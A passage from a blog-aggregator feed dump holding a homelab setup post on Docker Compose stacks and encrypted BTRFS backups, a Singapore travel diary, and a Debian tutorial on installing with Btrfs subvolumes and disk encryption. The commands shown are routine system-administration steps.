proved unnecessary for my use case. I have since standardized on a Git-based, Docker Compose workflow that prioritizes simplicity and transparency.\nDirectory Structure and “Stacks”#\nThe core of the system is a Git repository that holds all configurations. Each service is defined as a self-contained “stack” in its own directory. The structure is organized by machine, making it easy to manage multiple environments:\nhomelab\u002F\n├── deploy.sh                 # Main deployment script\n├── justfile                  # Task runner for common commands\n└── machines\u002F\n    ├── floyd-homelab-1\u002F      # Primary home server\n    │   ├── config.sh         # SSH and deployment settings\n    │   └── stacks\u002F\n    │       ├── immich\u002F\n    │       │   └── docker-compose.yml\n    │       └── paperless\u002F\n    │           └── docker-compose.yml\n    └── floyd-pub-1\u002F          # Public-facing VPS\n        ├── config.sh\n        └── stacks\u002F\n            ├── caddy\u002F\n            └── ntfy\u002F\nThis modular approach allows me to manage each application’s configuration, including its docker-compose.yml and any related files, as an independent unit.\nDeployment Workflow#\nDeployments are handled by a custom deploy.sh script, with a justfile providing a convenient command-runner interface. The process is fundamentally simple:\nSync: rsync copies the specified stack’s directory from the local Git repository to a REMOTE_BASE_PATH (e.g., \u002Fopt\u002Fhomelab) on the target machine.\nExecute: ssh runs the appropriate docker compose command on the remote machine.\nEach machine’s connection settings (SSH_HOST, SSH_USER, REMOTE_BASE_PATH) are defined in its machines\u002F\u003Cname>\u002Fconfig.sh file. This file can also contain pre_deploy and post_deploy hooks for custom actions.\nThe justfile makes daily operations trivial:\n# Deploy a single stack to a machine\njust deploy-stack floyd-homelab-1 immich\n\n# View the logs for a stack\njust logs floyd-homelab-1 immich\n\n# Test a deployment without making changes\njust dry-run floyd-homelab-1\n\nThis system provides fine-grained control over deployments, with support for actions like up, down, restart, pull, and recreate (which also removes persistent volumes).\nContainer & Configuration Patterns#\nTo keep the system consistent, I follow a few key patterns:\nData Persistence: Instead of using Docker named volumes, I use host bind mounts. All persistent data for a service is stored in a dedicated directory on the host, typically \u002Fdata\u002F\u003Cservice-name>. This makes backups and data management more transparent.\nReverse Proxy Network: The Caddy stack defines a shared Docker network called public_proxy. Other stacks that need to be exposed to the internet are configured to join this network. This allows Caddy to discover and proxy them without exposing their ports on the host machine. I have written about this pattern in detail in a previous post.\nPort Exposure: Services behind the reverse proxy use the expose directive in their docker-compose.yml to make ports available to Caddy within the Docker network. I avoid binding ports directly with ports unless absolutely necessary.\nMulti-Machine Topology#\nThe homelab comprises three distinct machines to provide isolation and redundancy.\nfloyd-homelab-1 (Primary Server): The core of the homelab, running on the AMD hardware detailed above. It runs data-intensive personal services (e.g., Immich, Paperless-ngx) and is accessible only via the Tailscale network.\nfloyd-pub-1 (Public VPS): A small cloud VPS that hosts public-facing services requiring high availability, such as DNS utilities, analytics, and notification relays.\nfloyd-monitor-public (Monitoring VPS): A small Hetzner VM running Gatus for health checks. Its independence ensures that I am alerted if the primary homelab or home network goes offline.\nThis distributed setup isolates my home network from the public internet and ensures that critical public services remain online even if the home server is down for maintenance.\nHosted Services#\nThe following is a breakdown of the services, or “stacks,” running on each machine. A few key services that are central to the homelab are detailed further in the next section.\nfloyd-homelab-1 (Primary Server)#\nActual: A local-first personal finance and budgeting tool.\nCaddy: A powerful, enterprise-ready, open source web server with automatic HTTPS.\nGitea: A Git service for personal projects.\nGlance: A dashboard for viewing all my feeds and data in one place.\nImmich: A photo and video backup solution, directly from my mobile phone.\nKarakeep: An app for bookmarking everything, with AI-based tagging and full-text search.\nOwntracks: A private location tracker for recording my own location data.\nPaperless-ngx: A document management system that transforms physical documents into a searchable online archive.\nSilverbullet: A Markdown-based knowledge management and note-taking tool.\nfloyd-monitor-public (Monitoring VPS)#\nCaddy: Reverse proxy for the services on this node.\nfloyd-pub-1 (Public VPS)#\nBeszel-agent: The agent for the Beszel monitoring platform.\nCaddy: Reverse proxy for the services on this node.\nCloak: A service to securely share sensitive text with others.\nDoggo: A command-line DNS Client for Humans, written in Golang.\nNtfy: A self-hosted push notification service.\nprom2grafana: A tool to convert Prometheus metrics to Grafana dashboards and alert rules using AI.\nUmami: A simple, fast, privacy-focused alternative to Google Analytics.\nService Highlights#\nTechnitium: A Powerful DNS Server#\nI came across Technitium DNS after seeing a recommendation from @oddtazz, and it has been a revelation. For anyone who wants more than just basic ad blocking from their DNS server, it’s a game-changer. It serves as both a recursive and authoritative server, meaning I don’t need a separate tool like unbound to resolve from root hints. The level of configuration is incredible—from DNSSEC, custom zones, and SOA records to fine-grained caching control.\nThe UI is a bit dated, but that’s a minor point for me given the raw power it provides. It is a vastly underrated tool for any homelabber who wants to go beyond Pi-hole or AdGuard Home.\n\n\nBeszel: Lightweight Monitoring#\nFor a long time, I felt that monitoring a homelab meant spinning up a full Prometheus and Grafana stack. Beszel is the perfect antidote to that complexity. It provides exactly what I need for basic node monitoring—CPU, memory, disk, and network usage—in a simple, lightweight package.\nIt’s incredibly easy to set up and provides a clean, real-time view of my servers without the overhead of a more complex system. For a simple homelab monitoring setup, it’s hard to beat.\n\n\nGatus: External Health Checks#\nWhile Beszel monitors the servers from the inside, Gatus watches them from the outside. Running on an independent Hetzner VM, its job is to ensure my services are reachable from the public internet. It validates HTTP status codes, response times, and more.\nThis separation is crucial; if my entire home network goes down, Gatus is still online to send an alert to my phone. It’s the final piece of the puzzle for robust monitoring, ensuring I know when things are broken even if the monitoring service itself is part of the outage.\n\n\nStorage and Backup Strategy#\nData integrity and recoverability are critical. My strategy is built on layers of redundancy and encryption.\nStorage: BTRFS RAID 1 + LUKS Encryption#\nI chose BTRFS for its modern features:\nChecksumming: Protects against silent data corruption.\nCopy-on-Write: Enables instantaneous, low-cost snapshots.\nTransparent Compression: zstd compression saves space without significant performance overhead.\nThe two 4TB drives are mirrored in a RAID 1 array, providing redundancy against a single drive failure. The entire array is encrypted using LUKS2, with the key stored on the boot SSD for automatic mounting. This protects data at rest in case of physical theft or drive disposal.\nMount options in \u002Fetc\u002Ffstab:\n\u002Fdev\u002Fmapper\u002Fcrypt-sda \u002Fmnt\u002Fstorage btrfs defaults,noatime,compress=zstd 0 2\nBackup: Restic + Cloudflare R2#\nRAID does not protect against accidental deletion, file corruption, or catastrophic failure. My backup strategy follows the 3-2-1 rule.\nDaily, automated backups are managed by systemd timers running restic. Backups are encrypted and sent to Cloudflare R2, providing an off-site copy. R2 was chosen for its zero-cost egress, which is a significant advantage for restores.\nThe backup script covers critical application data and the Docker Compose configurations:\nBACKUP_PATHS=(\n    \"\u002Fmnt\u002Fstorage\"        # All application data\n    \"\u002Fhome\u002Fkaran\u002Fstacks\"  # Docker Compose configs\n)\nEach backup run reports its status to a healthchecks.io endpoint, which sends a push notification on failure. I must appreciate its generous free tier, which is more than sufficient for my needs.\n\n\nConclusion#\nThis homelab represents a shift in philosophy from exploring complexity to valuing simplicity and reliability. The upfront hardware investment of ~$1,200 is offset by eliminating recurring cloud hosting costs and providing complete control over my data and services.\nFor those considering a homelab, my primary recommendation is to start with a simple, well-understood foundation. A reliable machine with a solid backup strategy is more valuable than a complex, hard-to-maintain cluster. The goal is to build a system that serves your needs, not one that you serve.",[],{"slug":394,"title":395,"link":396,"pubDate":397,"contentSnippet":398,"tags":399,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"porting-a-python-program-with-help-of-chat-gpt-1","Porting A Python program with help of Chat GPT – #1","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2025\u002F10\u002F01\u002Fporting-a-python-program-with-help-of-chat-gpt-1\u002F","Wed, 01 Oct 2025 12:27:59 +0000","Hi all, In 2024, I have started porting a python library open tamil https:\u002F\u002Fgithub.com\u002FEzhil-Language-Foundation\u002Fopen-tamil\u002F. I faced difficulties on tracking the port status of the application and noting the python symbols with php implementation with testing and documenting the changes over time because the code base itself not a small one. so i have decided to […]",[224,400,401,402,82],"chatgpt","php","porting",{"slug":404,"title":405,"link":406,"pubDate":407,"contentSnippet":408,"tags":409,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"binary-or-linear-the-hidden-math","Binary or Linear? The Hidden Math Behind Faster Code","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fbinary-or-linear-the-hidden-math","Mon, 29 Sep 2025 14:58:34 GMT","Follow a simple search problem to understand the power of Big O notation.",[],"Shubham Kumar","workdone0","\u002Fimages\u002Fworkdone0_photo.jpg","https:\u002F\u002Fworkdone0.substack.com\u002Ffeed",{"slug":415,"title":416,"link":417,"pubDate":418,"contentSnippet":419,"tags":420,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"singapore-trip","Singapore Trip","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsingapore-trip\u002F","Tue, 23 Sep 2025 17:05:26 +0530","In December 2024, I went on a trip through four countries - Singapore, Malaysia, Brunei, and Vietnam - with my friend Badri. This post covers our experiences in Singapore.\nI took an IndiGo flight from Delhi to Singapore, with a layover in Chennai. At the Chennai airport, I was joined by Badri. We had an early morning flight from Chennai that would land in Singapore in the afternoon. Within 48 hours of our scheduled arrival in Singapore, we submitted an arrival card online. At immigration, we simply needed to scan our passports at the gates, which opened automatically to let us through, and then give our address to an official nearby. The process was quick and smooth, but it unfortunately meant that we didn’t get our passports stamped by Singapore.\nBefore I left the airport, I wanted to visit the nature-themed park with a fountain I saw in pictures online. It is called Jewel Changi, and it took quite some walking to get there. After reaching the park, we saw a fountain that could be seen from all the levels. We roamed around for a couple of hours, then proceeded to the airport metro station to get to our hotel.\n\n      \nA shot of Jewel Changi. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nThere were four ATMs on the way to the metro station, but none of them provided us with any cash. This was the first country (outside India, of course!) where my card didn’t work at ATMs.\nTo use the metro, one can tap the EZ-Link card or bank cards at the AFC gates to get in. You cannot buy tickets using cash. Before boarding the metro, I used my credit card to get Badri an EZ-Link card from a vending machine. It was 10 Singapore dollars (₹630) - 5 for the card, and 5 for the balance. I had planned to use my Visa credit card to pay for my own fare. I was relieved to see that my card worked, and I passed through the AFC gates.\nWe had booked our stay at a hostel named Campbell’s Inn, which was the cheapest we could find in Singapore. It was ₹1500 per night for dorm beds. The hostel was located in Little India. While Little India has an eponymous metro station, the one closest to our hostel was Rochor.\nOn the way to the hostel, we found out that our booking had been canceled.\nWe had booked from the Hostelworld website, opting to pay the deposit in advance and to pay the balance amount in person upon reaching. However, Hostelworld still tried to charge Badri’s card again before our arrival. When the unauthorized charge failed, they sent an automatic message saying “we tried to charge” and to contact them soon to avoid cancellation, which we couldn’t do as we were in the plane.\nDespite this, we went to the hostel to check the status of our booking.\nThe trip from the airport to Rochor required a couple of transfers. It was 2 Singapore dollars (approx. ₹130) and took approximately an hour.\nUpon reaching the hostel, we were informed that our booking had indeed been canceled, and were not given any reason for the cancelation. Furthermore, no beds were available at the hostel for us to book on the spot.\nWe decided to roam around and look for accommodation at other hostels in the area. Soon, we found a hostel by the name of Snooze Inn, which had two beds available. It was 36 Singapore dollars per person (around ₹2300) for a dormitory bed. Snooze Inn advertised supporting RuPay cards and UPI. Some other places in that area did the same. We paid using my card. We checked in and slept for a couple of hours after taking a shower.\nBy the time we woke up, it was dark. We met Praveen’s friend Sabeel to get my FLX1 phone. We also went to Mustafa Center nearby to exchange Indian rupees for Singapore dollars. Mustafa Center also had a shopping center with shops selling electronic items and souvenirs, among other things. When we were dropping off Sabeel at a bus stop, we discovered that the bus stops in Singapore had a digital board mentioning the bus routes for the stop and the number of minutes each bus was going to take.\nIn addition to an organized bus system, Singapore had good pedestrian infrastructure. There were traffic lights and zebra crossings for pedestrians to cross the roads. Unlike in Indian cities, rules were being followed. Cars would stop for pedestrians at unmanaged zebra crossings; pedestrians would in turn wait for their crossing signal to turn green before attempting to walk across. Therefore, walking in Singapore was easy.\nTraffic rules were taken so seriously in Singapore I (as a pedestrian) was afraid of unintentionally breaking them, which could get me in trouble, as breaking rules is dealt with heavy fines in the country. For example, crossing roads without using a marked crossing (while being within 50 meters of it) - also known as jaywalking - is an offence in Singapore.\nMoreover, the streets were litter-free, and cleanliness seemed like an obsession.\nAfter exploring Mustafa Center, we went to a nearby 7-Eleven to top up Badri’s EZ-Link card. He gave 20 Singapore dollars for the recharge, which credited the card by 19.40 Singapore dollars (0.6 dollars being the recharge fee).\nWhen I was planning this trip, I discovered that the World Chess Championship match was being held in Singapore. I seized the opportunity and bought a ticket in advance. The next day - the 5th of December - I went to watch the 9th game between Gukesh Dommaraju of India and Ding Liren of China. The venue was a hotel on Sentosa Island, and the ticket was 70 Singapore dollars, which was around ₹4000 at the time.\nWe checked out from our hostel in the morning, as we were planning to stay with Badri’s aunt that night. We had breakfast at a place in Little India. Then we took a couple of buses, followed by a walk to Sentosa Island. Paying the fare for the buses was similar to the metro - I tapped my credit card in the bus, while Badri tapped his EZ-Link card. We also had to tap it while getting off.\nIf you are tapping your credit card to use public transport in Singapore, keep in mind that the total amount of all the trips taken on a day is deducted at the end. This makes it hard to determine the cost of individual trips. For example, I could take a bus and get off after tapping my card, but I would have no way to determine how much this journey cost.\nWhen you tap in, the maximum fare amount gets deducted. When you tap out, the balance amount gets refunded (if it’s a shorter journey than the maximum fare one). So, there is incentive for passengers not to get off without tapping out. Going by your card statement, it looks like all that happens virtually, and only one statement comes in at the end. Maybe this combining only happens for international cards.\nWe got off the bus a kilometer away from Sentosa Island and walked the rest of the way. We went on the Sentosa Boardwalk, which is itself a tourist attraction. I was using Organic Maps to navigate to the hotel Resorts World Sentosa, but Organic Maps’ route led us through an amusement park. I tried asking the locals (people working in shops) for directions, but it was a Chinese-speaking region, and they didn’t understand English. Fortunately, we managed to find a local who helped us with the directions.\n\n      \nA shot of Sentosa Boardwalk. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nFollowing the directions, we somehow ended up having to walk on a road which did not have pedestrian paths. Singapore is a country with strict laws, so we did not want to walk on that road. Avoiding that road led us to the Michael Hotel. There was a person standing at the entrance, and I asked him for directions to Resorts World Sentosa. The person told me that the bus (which was standing at the entrance) would drop me there! The bus was a free service for getting to Resorts World Sentosa. Here I parted ways with Badri, who went to his aunt’s place.\nI got to the Resorts Sentosa and showed my ticket to get in. There were two zones inside - the first was a room with a glass wall separating the audience and the players. This was the room to watch the game physically, and resembled a zoo or an aquarium. :) The room was also a silent room, which means talking or making noise was prohibited. Audiences were only allowed to have mobile phones for the first 30 minutes of the game - since I arrived late, I could not bring my phone inside that room.\nThe other zone was outside this room. It had a big TV on which the game was being broadcast along with commentary by David Howell and Jovanka Houska - the official FIDE commentators for the event. If you don’t already know, FIDE is the authoritative international chess body.\nI spent most of the time outside that silent room, giving me an opportunity to socialize. A lot of people were from Singapore. I saw there were many Indians there as well. Moreover, I had a good time with Vasudevan, a journalist from Tamil Nadu who was covering the match. He also asked questions to Gukesh during the post-match conference. His questions were in Tamil to lift Gukesh’s spirits, as Gukesh is a Tamil speaker.\nTea and coffee were free for the audience. I also bought a T-shirt from their stall as a souvenir.\nAfter the game, I took a shuttle bus from Resorts World Sentosa to a metro station, then travelled to Pasir Ris by metro, where Badri was staying with his aunt. I thought of getting something to eat, but could not find any cafés or restaurants while I was walking from the Pasir Ris metro station to my destination, and was positively starving when I got there.\nBadri’s aunt’s place was an apartment in a gated community. On the gate was a security guard who asked me the address of the apartment. Upon entering, there were many buildings. To enter the building, you need to dial the number of the apartment you want to go to and speak to them. I had seen that in the TV show Seinfeld, where Jerry’s friends used to dial Jerry to get into his building.\nI was afraid they might not have anything to eat because I told them I was planning to get something on the way. This was fortunately not the case, and I was relieved to not have to sleep with an empty stomach.\nBadri’s uncle gave us an idea of how safe Singapore is. He said that even if you forget your laptop in a public space, you can go back the next day to find it right there in the same spot. I also learned that owning cars was discouraged in Singapore - the government imposes a high registration fee on them, while also making public transport easy to use and affordable. I also found out that 7-Eleven was not that popular among residents in Singapore, unlike in Malaysia or Thailand.\nThe next day was our third and final day in Singapore. We had a bus in the evening to Johor Bahru in Malaysia. We got up early, had breakfast, and checked out from Badri’s aunt’s home. A store by the name of Cat Socrates was our first stop for the day, as Badri wanted to buy some stationery. The plan was to take the metro, followed by the bus. So we got to Pasir Ris metro station. Next to the metro station was a mall. In the mall, Badri found an ATM where our cards worked, and we got some Singapore dollars.\nIt was noon when we reached the stationery shop mentioned above. We had to walk a kilometer from the place where the bus dropped us. It was a hot, sunny day in Singapore, so walking was not comfortable. We had to go through residential areas in Singapore. We saw some non-touristy parts of Singapore.\nAfter we were done with the stationery shop, we went to a hawker center to get lunch. Hawker centers are unique to Singapore. They have a lot of shops that sell local food at cheap prices. It is similar to a food court. However, unlike the food courts in malls, hawker centers are open-air and can get quite hot.\n\n      \nThis is the hawker center we went to. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nTo have something, you just need to buy it from one of the shops and find a table. After you are done, you need to put your tray in the tray-collecting spots. I had a kaya toast with chai, since there weren’t many vegetarian options. I also bought a persimmon from a nearby fruit vendor. On the other hand, Badri sampled some local non-vegetarian dishes.\n\n      \nTable littering at the hawker center was prohibited by law. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nNext, we took a metro to Raffles Place, as we wanted to visit Merlion, the icon of Singapore. It is a statue having the head of a lion and the body of a fish. While getting through the AFC gates, my card was declined. Therefore, I had to buy an EZ-Link card, which I had been avoiding because the card itself costs 5 Singapore dollars.\nFrom the Raffles Place metro station, we walked to Merlion. The place also gave a nice view of Marina Bay Sands. It was filled with tourists clicking pictures, and we also did the same.\n\n      \nMerlion from behind, giving a good view of Marina Bay Sands. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nAfter this, we went to the bus stop to catch our bus to the border city of Johor Bahru, Malaysia. The bus was more than an hour late, and we worried that we had missed the bus. I asked an Indian woman at the stop who also planned to take the same bus, and she told us that the bus was late. Finally, our bus arrived, and we set off for Johor Bahru.\nBefore I finish, let me give you an idea of my expenditure. Singapore is an expensive country, and I realized that expenses could go up pretty quickly. Overall, my stay in Singapore for 3 days and 2 nights was approx. 5500 rupees. That too, when we stayed one night at Badri’s aunt’s place (so we didn’t have to pay for accomodation for one of the nights) and didn’t have to pay for a couple of meals. This amount doesn’t include the ticket for the chess game, but includes the costs of getting there. If you are in Singapore, it is likely you will pay a visit to Sentosa Island anyway.\nStay tuned for our experiences in Malaysia!\nCredits: Thanks to Dione, Sahil, Badri and Contrapunctus for reviewing the draft. Thanks to Bhe for spotting a duplicate sentence.",[],{"slug":422,"title":423,"link":424,"pubDate":425,"contentSnippet":426,"tags":427,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"emptiness","Emptiness","https:\u002F\u002Fwww.prashanthudupa.com\u002Femptiness\u002F","Sun, 14 Sep 2025 17:02:09 +0000","When I take a close look at anything, it seems to dissolve and eventually disappear. Behind everything, there is just emptiness. There is no solid stuff. It’s all empty. I understand that this can be a lot to take all at once. Let’s unpack it gently. What does ’empty’ mean? The word “empty” means exactly […]",[148,149],{"slug":429,"title":430,"link":431,"pubDate":432,"contentSnippet":433,"tags":434,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"installing-debian-with-btrfs-and-encryption","Installing Debian With Btrfs and Encryption","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Finstalling-debian-with-btrfs-and-encryption\u002F","Sat, 30 Aug 2025 01:53:11 +0530","Motivation\nOn the 8th of August 2025 (a day before the Debian Trixie release), I was upgrading my personal laptop from Debian Bookworm to Trixie. It was a major update. However, the update didn’t go smoothly, and I ran into some errors. From the Debian support IRC channel, I got to know that it would be best if I removed the texlive packages.\nHowever, it was not so easy to just remove texlive with a simple apt remove command. I had to remove the texlive packages from \u002Fusr\u002Fbin. Then I ran into other errors. Hours after I started the upgrade, I realized I preferred having my system as it was before, as I had to travel to Noida the next day. Needless to say, I wanted to go to sleep rather than fix my broken system. Only if I had a way to go back to my system before I started upgrading, it would have saved a lot of trouble for me. I ended up installing Trixie from scratch.\nIt turns out that there was a way to recover to the state before the upgrade - using Timeshift to roll back the system to a state (in our example, it is the state before the upgrade process started) in the past. However, it needs the Btrfs filesystem with appropriate subvolumes, not provided by Debian installer in their guided partitioning menu.\nI have set it up after a few weeks of the above-mentioned incident. Let me demonstrate how it works.\n\n\n\nCheck the screenshot above. It shows a list of snapshots made by Timeshift. Some of them were made by me manually. Others were made by Timeshift automatically as per the routine - I have set up hourly backups and weekly backups etc.\nIn the above-mentioned major update, I could have just taken a snapshot using Timeshift before performing the upgrade and could have rolled back to that snapshot when I found that I cannot spend more time on fixing my installation errors. Then I could just perform the upgrade later.\nInstallation\nIn this tutorial, I will cover how I installed Debian with Btrfs and disk encryption, along with creating subvolumes @ for root and @home for \u002Fhome so that I can use Timeshift to create snapshots. These snapshots are kept on the same disk where Debian is installed, and the use-case is to roll back to a working system in case I mess up something or to recover an accidentally deleted file.\nI went through countless tutorials on the Internet, but I didn’t find a single tutorial covering both the disk encryption and the above-mentioned subvolumes (on Debian). Debian doesn’t create the desired subvolumes by default, therefore the process requires some manual steps, which beginners may not be comfortable performing. Beginners can try distros such as Fedora and Linux Mint, as their installation includes Btrfs with the required subvolumes.\nFurthermore, it is pertinent to note that I used Debian Trixie’s DVD iso on a real laptop (not a virtual machine) for my installation. Debian Trixie is the codename for the current stable version of Debian. Then I took screenshots in a virtual machine by repeating the process. Moreover, a couple of screenshots are from the installation I did on the real laptop.\nLet’s start the tutorial by booting up the Debian installer.\n\n\n\nThe above screenshot shows the first screen we see on the installer. Since we want to choose Expert Install, we select Advanced Options in the screenshot above.\n\n\n\nLet’s select the Expert Install option in the above screenshot. It is because we want to create subvolumes after the installer is done with the partition, and only then proceed to installing the base system. “Non-expert” install modes proceed directly to installing the system right after creating partitions without pausing for us to create the subvolumes.\n\n\n\nAfter selecting the Expert Install option, you will get the screen above. I will skip to partitioning from here and leave the intermediate steps such as choosing language, region, connecting to Wi-Fi, etc. For your reference, I did create the root user.\n\n\n\nLet’s jump right to the partitioning step. Select the Partition disks option from the menu as shown above.\n\n\n\nChoose Manual.\n\n\n\nSelect your disk where you would like to install Debian.\n\n\n\nSelect Yes when asked for creating a new partition.\n\n\n\nI chose the msdos option as I am not using UEFI. If you are using UEFI, then you need to choose the gpt option. Also, your steps will (slightly) differ from mine if you are using UEFI. In that case, you can watch this video by the YouTube channel EF Linux in which he creates an EFI partition. As he doesn’t cover disk encryption, you can continue reading this post after following the steps corresponding to EFI.\n\n\n\nSelect the free space option as shown above.\n\n\n\nChoose Create a new partition.\n\n\n\nI chose the partition size to be 1 GB.\n\n\n\nChoose Primary.\n\n\n\nChoose Beginning.\n\n\n\nNow, I got to this screen.\n\n\n\nI changed mount point to \u002Fboot and turned on the bootable flag and then selected “Done setting up the partition.”\n\n\n\nNow select free space.\n\n\n\nChoose the Create a new partition option.\n\n\n\nI made the partition size equal to the remaining space on my disk. I do not intend to create a swap partition, so I do not need more space.\n\n\n\nSelect Primary.\n\n\n\nSelect the Use as option to change its value.\n\n\n\nSelect “physical volume for encryption.”\n\n\n\nSelect Done setting up the partition.\n\n\n\nNow select “Configure encrypted volumes.”\n\n\n\nSelect Yes.\n\n\n\nSelect Finish.\n\n\n\nSelecting Yes will take a lot of time to erase the data. Therefore, I would say if you have hours for this step (in case your SSD is like 1 TB), then I would recommend selecting “Yes.” Otherwise, you could select “No” and compromise on the quality of encryption.\nAfter this, you will be asked to enter a passphrase for disk encryption and confirm it. Please do so. I forgot to take the screenshot for that step.\n\n\n\nNow select that encrypted volume as shown in the screenshot above.\n\n\n\nHere we will change a couple of options which will be shown in the next screenshot.\n\n\n\nIn the Use as menu, select “btrfs journaling file system.”\n\n\n\nNow, click on the mount point option.\n\n\n\nChange it to “\u002F - the root file system.”\n\n\n\nSelect Done setting up the partition.\n\n\n\nThis is a preview of the paritioning after performing the above-mentioned steps.\n\n\n\nIf everything is okay, proceed with the Finish partitioning and write changes to disk option.\n\n\n\nThe installer is reminding us to create a swap partition. I proceeded without it as I planned to add swap after the installation.\n\n\n\nIf everything looks fine, choose “yes” for writing the changes to disks.\n\n\n\nNow we are done with partitioning and we are shown the screen in the screenshot above. If we had not selected the Expert Install option, the installer would have proceeded to install the base system without asking us.\nHowever, we want to create subvolumes before proceeding to install the base system. This is the reason we chose Expert Install.\nNow press Ctrl + F2.\n\n\n\nYou will see the screen as in the above screenshot. It says “Please press Enter to activate this console.” So, let’s press Enter.\n\n\n\nAfter pressing Enter, we see the above screen.\n\n\n\nThe screenshot above shows the steps I performed in the console. I followed the already mentioned video by EF Linux for this part and adapted it to my situation (he doesn’t encrypt the disk in his tutorial).\nFirst we run df -h to have a look at how our disk is partitioned. In my case, the output was:\n# df -h\nFilesystem              Size  Used  Avail   Use% Mounted on\ntmpfs                   1.6G  344.0K  1.6G    0% \u002Frun\ndevtmpfs                7.7G       0  7.7G   0% \u002Fdev\n\u002Fdev\u002Fsdb1               3.7G    3.7G    0   100% \u002Fcdrom\n\u002Fdev\u002Fmapper\u002Fsda2_crypt  952.9G  5.8G  950.9G  0% \u002Ftarget\n\u002Fdev\u002Fsda1               919.7M  260.0K  855.8M  0% \u002Ftarget\u002Fboot\n\ndf -h shows us that \u002Fdev\u002Fmapper\u002Fsda2_crypt and \u002Fdev\u002Fsda1 are mounted on \u002Ftarget and \u002Ftarget\u002Fboot respectively.\nLet’s unmount them. For that, we run:\n# umount \u002Ftarget\n# umount \u002Ftarget\u002Fboot\n\nNext, let’s mount our root filesystem to \u002Fmnt.\n# mount \u002Fdev\u002Fmapper\u002Fsda2_crypt \u002Fmnt\n\nLet’s go into the \u002Fmnt directory.\n# cd \u002Fmnt\n\nUpon listing the contents of this directory, we get:\n\u002Fmnt # ls\n@rootfs\n\nDebian installer has created a subvolume @rootfs automatically. However, we need the subvolumes to be @ and @home. Therefore, let’s rename the @rootfs subvolume to @.\n\u002Fmnt # mv @rootfs @\n\nListing the contents of the directory again, we get:\n\u002Fmnt # ls\n@\n\nWe only one subvolume right now. Therefore, let us go ahead and create another subvolume @home.\n\u002Fmnt # btrfs subvolume create @home\nCreate subvolume '.\u002F@home'\n\nIf we perform ls now, we will see there are two subvolumes:\n\u002Fmnt # ls\n@ @home\n\nLet us mount \u002Fdev\u002Fmapper\u002Fsda2_crypt to \u002Ftarget\n\u002Fmnt # mount -o noatime,space_cache=v2,compress=zstd,ssd,discard=async,subvol=@ \u002Fdev\u002Fmapper\u002Fsda2_crypt \u002Ftarget\u002F\n\nNow we need to create a directory for \u002Fhome.\n\u002Fmnt # mkdir \u002Ftarget\u002Fhome\u002F\n\nNow we mount the \u002Fhome directory with subvol=@home option.\n\u002Fmnt # mount -o noatime,space_cache=v2,compress=zstd,ssd,discard=async,subvol=@home \u002Fdev\u002Fmapper\u002Fsda2_crypt \u002Ftarget\u002Fhome\u002F\n\nNow mount \u002Fdev\u002Fsda1 to \u002Ftarget\u002Fboot.\n\u002Fmnt # mount \u002Fdev\u002Fsda1 \u002Ftarget\u002Fboot\u002F\n\nNow we need to add these options to the fstab file, which is located at \u002Ftarget\u002Fetc\u002Ffstab. Unfortunately, vim is not installed in this console. The only way to edit is Nano.\nnano \u002Ftarget\u002Fetc\u002Ffstab\n\n\n\n\nEdit your fstab file to look similar to the one in the screenshot above. I am pasting the fstab file contents below for easy reference.\n# \u002Fetc\u002Ffstab: static file system information.\n#\n# Use 'blkid' to print the universally unique identifier for a\n# device; this may be used with UUID= as a more robust way to name devices\n# that works even if disks are added and removed. See fstab(5).\n#\n# systemd generates mount units based on this file, see systemd.mount(5).\n# Please run 'systemctl daemon-reload' after making changes here.\n#\n# \u003Cfile system> \u003Cmount point>   \u003Ctype>  \u003Coptions>       \u003Cdump>  \u003Cpass>\n\u002Fdev\u002Fmapper\u002Fsda2_crypt \u002F        btrfs   noatime,compress=zstd,ssd,discard=async,space_cache=v2,subvol=@ 0       0\n\u002Fdev\u002Fmapper\u002Fsda2_crypt \u002Fhome    btrfs   noatime,compress=zstd,ssd,discard=async,space_cache=v2,subvol=@home 0       0\n# \u002Fboot was on \u002Fdev\u002Fsda1 during installation\nUUID=12842b16-d3b3-44b4-878a-beb1e6362fbc \u002Fboot           ext4    defaults        0       2\n\u002Fdev\u002Fsr0        \u002Fmedia\u002Fcdrom0   udf,iso9660 user,noauto     0       0\n\nPlease double check the fstab file before saving it. In Nano, you can press Ctrl+O followed by pressing Enter to save the file. Then press Ctrl+X to quit Nano. Now, preview the fstab file by running\ncat \u002Ftarget\u002Fetc\u002Ffstab\n\nand verify that the entries are correct, otherwise you will booted to an unusable and broken system after the installation is complete.\nNext, press Ctrl + Alt + F1 to go back to the installer.\n\n\n\nProceed to “Install the base system.”\n\n      \nScreenshot of Debian installer installing the base system.\n\n\n\nI chose the default option here - linux-image-amd64.\nAfter this, the installer will ask you a few more questions. For desktop environment, I chose KDE Plasma. You can choose the desktop environment as per your liking. I will not cover the rest of the installation process and assume that you were able to install from here.\nPost installation\nLet’s jump to our freshly installed Debian system. Since I created a root user, I added the user ravi to the suoders file (\u002Fetc\u002Fsudoers) so that ravi can run commands with sudo. Follow this if you would like to do the same.\nNow we set up zram as swap. First, install zram-tools.\nsudo apt install zram-tools\n\nNow edit the file \u002Fetc\u002Fdefault\u002Fzramswap and make sure to have the following lines are uncommented:\nALGO=lz4\nPERCENT=50\n\nNow, run\nsudo systemctl restart zramswap\n\nIf you run lsblk now, you should see the below-mentioned entry in the output:\nzram0          253:0    0   7.8G  0 disk  [SWAP]\n\nThis shows us that zram has been activated as swap.\nNow we install timeshift, which can be done by running\nsudo apt install timeshift\n\nAfter the installation is complete, run Timeshift and schedule snapshots as you please. We are done now. Hope the tutorial was helpful.\nSee you in the next post and let me know if you have any suggestions and questions on this 